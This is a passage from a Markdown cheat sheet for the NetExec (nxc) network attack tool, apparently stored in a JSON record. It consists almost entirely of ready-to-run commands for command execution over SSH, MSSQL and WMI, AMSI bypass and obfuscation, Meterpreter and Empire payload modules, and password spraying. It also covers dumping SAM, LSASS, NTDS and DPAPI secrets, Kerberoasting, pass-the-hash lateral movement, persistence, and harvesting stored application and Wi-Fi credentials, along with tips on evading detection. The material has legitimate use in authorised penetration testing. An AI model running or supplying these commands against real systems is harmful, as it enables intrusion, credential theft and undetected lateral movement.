--ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 
192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            
# Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               
# Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler            
        # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb                        # Access NXC database\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                    
          # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. 
Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}